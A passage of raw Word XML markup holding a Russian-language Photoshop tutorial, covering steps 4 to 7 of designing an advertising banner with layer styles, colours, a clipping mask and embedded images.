                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId468" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1627796" cy="1564586"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidTr="00E57474">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidRDefault="00E57474" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Шаг 4.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Нарисуйте прямоугольник и установите цвет # </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>b90909</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidTr="00E57474">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4994" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidRDefault="00E57474" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1176150" cy="1193481"/>
                  <wp:effectExtent l="19050" t="0" r="4950" b="0"/>
                  <wp:docPr id="69" name="Рисунок 765" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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http://ok-t.ru/studopedia/baza14/71156389034.files/image023.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId469" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1175691" cy="1193016"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4860" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="00E57474" w:rsidRPr="00617AC0" w:rsidRDefault="00E57474" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1202135" cy="1195200"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="70" name="Рисунок 766" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image024.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId470" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1204948" cy="1197997"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Откройте диалоговое окно </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Стили слоя</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (layerstyles)и настройте </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Тень</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Dropshadow). Уменьшите </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>расстояние</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (distance ) и </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>размер</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (size ) на 2px.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">добавьте </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Наложение градиента</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (GradientOverlay) и установите режим смешивания на </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Умножение</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Multiply) с непрозрачностью 28%.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Добавьте обводку и уменьшите ее размер до 1 пикс. Установите цвет # </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>a31b1b</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3284" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1362930" cy="1824509"/>
                  <wp:effectExtent l="19050" t="0" r="8670" b="0"/>
                  <wp:docPr id="90" name="Рисунок 767" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/im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http://ok-t.ru/studopedia/baza14/71156389034.files/image025.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId471" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1362666" cy="1824155"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1939350" cy="1568327"/>
                  <wp:effectExtent l="19050" t="0" r="3750" b="0"/>
                  <wp:docPr id="91" name="Рисунок 768" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/im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http://ok-t.ru/studopedia/baza14/71156389034.files/image026.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId472" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1939650" cy="1568570"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3285" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1380059" cy="1821600"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="92" name="Рисунок 769" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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http://ok-t.ru/studopedia/baza14/71156389034.files/image027.jpg"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId473" cstate="print"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1379770" cy="1821219"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D2081A" w:rsidRPr="00617AC0" w:rsidRDefault="00D2081A" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Шаг 5.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Добавим список рекламных предложений. У нас это будет </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tutorials</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Уроки), </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Articles</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(Статьи), </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Tips</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Советы), </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Freebies</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (бесплатно), </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Basix</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Азы), </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Videos</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Видео), </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Premuim</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Премиум) как показано на рисунке.</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18"/>
        <w:gridCol w:w="2268"/>
        <w:gridCol w:w="5068"/>
      </w:tblGrid>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1406550" cy="1410718"/>
                  <wp:effectExtent l="19050" t="0" r="3150" b="0"/>
                  <wp:docPr id="71" name="Рисунок 770" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image028.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId474" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1409587" cy="1413764"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7336" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Растрируйте текстовые слои и создайте </w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Обтравочную маску</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Сreate a clippingmask).</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1348950" cy="1381936"/>
                  <wp:effectExtent l="19050" t="0" r="3600" b="0"/>
                  <wp:docPr id="72" name="Рисунок 771" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image029.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId475" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1348172" cy="1381139"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Шаг 6.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Теперь поместите привлекательную картинку. В нашем случае мы использовали значок премиум-программы для PSDTUTS, но вы можете использовать все, что подходит вам.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1363350" cy="1389869"/>
                  <wp:effectExtent l="19050" t="0" r="8250" b="0"/>
                  <wp:docPr id="74" name="Рисунок 772" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image030.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId476" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1367944" cy="1394552"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5068" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Шаг 7.</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Добавим еще нужный текст ниже картинки, которую мы вставили в шаге 6.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:noProof/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="1679499" cy="1699200"/>
                  <wp:effectExtent l="19050" t="0" r="0" b="0"/>
                  <wp:docPr id="75" name="Рисунок 773" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image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http://ok-t.ru/studopedia/baza14/71156389034.files/image031.png"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId477" cstate="print">
                            <a:lum bright="10000"/>
                          </a:blip>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1679164" cy="1698861"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter lim="800000"/>
                            <a:headEnd/>
                            <a:tailEnd/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidTr="007755F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w:rsidR="001A54D1" w:rsidRPr="00617AC0" w:rsidRDefault="001A54D1" w:rsidP="007755F7">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
